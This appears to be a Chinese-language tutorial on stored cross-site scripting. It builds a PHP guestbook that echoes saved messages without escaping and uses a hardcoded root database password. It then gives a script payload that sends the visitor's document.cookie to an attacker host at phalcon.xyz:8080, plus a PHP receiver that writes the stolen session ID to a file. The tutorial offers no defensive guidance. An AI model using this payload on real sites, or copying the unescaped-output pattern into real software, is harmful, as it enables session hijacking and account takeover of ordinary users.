原理:将xss攻击代码保存到数据库内,动态显示在web页面上
我们以本地服务器作为被攻击者目标,攻击者服务器为http://phalcon.xyz:8080
1.新建一个文件,命名为message.php
<?php
session_start();
//连接数据库
try {
$con = new PDO('mysql:host=127.0.0.1;dbname=xss_message;port=3316', 'root', "111111");
$con->exec("set names utf8");
} catch (PDOException $e) {
echo $e->getMessage();
}
try{
$sql = "SELECT * from `message` ORDER BY id desc";
$prepare = $con->prepare($sql);
$prepare->execute();
$res = $prepare->fetchAll(PDO::FETCH_ASSOC);
}catch (PDOException $e){
echo $e->getMessage();
}
?>
<!DOCTYPE html>
<html>
<head>
<title>xss攻击</title>
<meta charset="utf-8">
</head>
<body>
<form action="form.php" method="post">
姓名:<input type="text" name="name" id=""><br>
留言:<textarea rows="4" cols="30" name="message" style="margin-top:5px;"></textarea><br/>
<input type="submit" name="" value='提交'>
</form>
<br/>留言记录:<br/>
<?php foreach($res as $val){?>
<?php echo $val['name'];?>:<span style="color:red"><?php echo $val['message'];?></span><br>
<? }?>
</html>
2.新建一个form.php,用于保存数据
<?php
//连接数据库
try {
$con = new PDO('mysql:host=127.0.0.1;dbname=xss_message;port=3316', 'root', "111111");
$con->exec("set names utf8");
} catch (PDOException $e) {
echo $e->getMessage();
}
$name = trim($_POST['name']);
$message = trim($_POST['message']);
if(empty($name) or empty($message)){
header('Location: ./message.php');
return false;
}
try{
$sql = "INSERT INTO `message` (`name`,`message`) VALUES (:name,:message)";
$prepare = $con->prepare($sql);
$data = $prepare->execute(array(':name'=>$name,':message'=>$message));
header('Location: ./message.php');
}catch (PDOException $e){
echo $e->getMessage();
}
?>
3.往留言框里嵌入非法代码
<script>
var Str=document.cookie;
var a =document.createElement('a');
a.href='http://phalcon.xyz:8080/getCookie.php?'+Str;
a.innerHTML="<img src='./aa.jpg'>";
document.body.appendChild(a);
</script>
点击提交插入数据库
查看源码
<html>
<head>
<title>xss攻击</title>
<meta charset="utf-8">
</head>
<body>
<form action="form.php" method="post">
姓名:<input type="text" name="name" id=""><br>
留言:<textarea rows="4" cols="30" name="message" style="margin-top:5px;"></textarea><br/>
<input type="submit" name="" value='提交'>
</form>
<br/>留言记录:<br/>
xss:<span style="color:red"><script>
var Str=document.cookie;
var a =document.createElement('a');
a.href='http://phalcon.xyz:8080/getCookie.php?'+Str;
a.innerHTML="<img src='./aa.jpg'>";
document.body.appendChild(a);
</script></span><br>
1111:<span style="color:red">222</span><br>
</html>
4.在攻击者服务器获取sessionId
<?php
$cookie=$_GET['PHPSESSID'];
file_put_contents('xss.txt',$cookie);
?>
当用户点击图片时,sessionID将被盗